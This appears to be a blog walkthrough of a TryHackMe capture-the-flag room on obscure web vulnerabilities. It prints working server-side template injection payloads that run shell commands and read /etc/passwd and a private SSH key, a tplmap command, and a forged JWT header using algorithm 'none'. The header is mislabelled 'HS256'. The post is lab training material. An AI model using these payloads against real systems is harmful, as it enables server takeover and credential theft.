Obscure Web Vulns

October 7, 2020

This post is a walkthrough for the TryHackMe room ZTH: Obscure Web Vulns. I highly recommend having the Payload All Things while doing this room or just for your toolkit.

https://github.com/swisskyrepo/PayloadsAllTheThings/

TASK 1 – 3

Just read, and click the button to complete.

TASK 4: Manual exploitation of SSTI

4.0: “How would a hacker(you) cat out /etc/passwd on the server(using cat with the rce payload)”

{{config.__class__.__init__.__globals__['os'].popen('cat /etc/passwd').read()}}

4.1: “What about reading in the contents of the user test’s private ssh key.(use the read file one not the rce one)”

{{ ''.__class__.__mro__[2].__subclasses__()[40]('/home/test/.ssh/id_rsa').read() }}

TASK 5: Automatic Exploitation of SSTI

5.0: “How would I cat out /etc/passwd using tplmap on the ip:port combo 10.10.10.10:5000, with the vulnerable param “noot”.”

tplmap -u http://10.10.10.10:5000/ -d 'noot' --os-cmd "cat /etc/passwd"

TASK 6: Challenge

6.0: For this flag I found it easy to just use ls combined with cat in the previously learned tasks. We can see here we are in /home/para

{{config.__class__.__init__.__globals__['os'].popen('cat /etc/passwd').read()}}

Once I entered this in the search bar, it gave me a list of parent-level directories.

{{config.__class__.__init__.__globals__['os'].popen('ls ../').read()}}

I will change some of the command so I may cat the file out.

{{config.__class__.__init__.__globals__['os'].popen('cat ../flag').read()}}

Here is our flag!

TASK 7 – 8

Just read, and click the button to complete.

Task 9: CSRF: Automatic Exploitation

--malicious

TASK 10 – 13

Just read, and click the button to complete.

Task 14: JWT: Challenge!

Having the Payload All Things: JWT – JSON Web Token, reading here was helpful. Task 12 will explain this very well here.

TASK 15 – 17

Just read, and click the button to complete.

TASK 18: JWT: Challenge

This task was a little frustrating due to https://jwt.io/ not allowing me to edit the header part of the JWT without completely disappearing. So, what I ended up doing was I grabbed the header from task 16 since I knew we would use HS256 and JWT for the challenge.

HS256 Header: eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0

(You can see my algorithm set as none in the first picture when I would try to make an edit the header would completely vanish.)

Original

Copied Header

I then went to the developer tools in Firefox to change out my JWT. Once I copied the new token in exchange for my current token, I was greeted with an admin page.

TASK 19 – 21

Just read, and click the button to complete.

TASK 22: XXE: Challenge

22.0: How many users are on the system?

31

22.1: What is the name of the user with a UID of 1000?

para

Follow task 20 here, it does a great job explaining, along with “Payload All Things”. It would also be helpful to use burpsuite here.

XXE revealing information about the server.

TASK 23 – 24

Just read, and click the button to complete.

TASK 25: Bonus Section: Challenge

First, get jwt-cracker

npm install --global jwt-cracker

Next, input the token the same way task 24 does. Token, Alphabet, and Length.

TASK 26: Credits

Read and celebrate.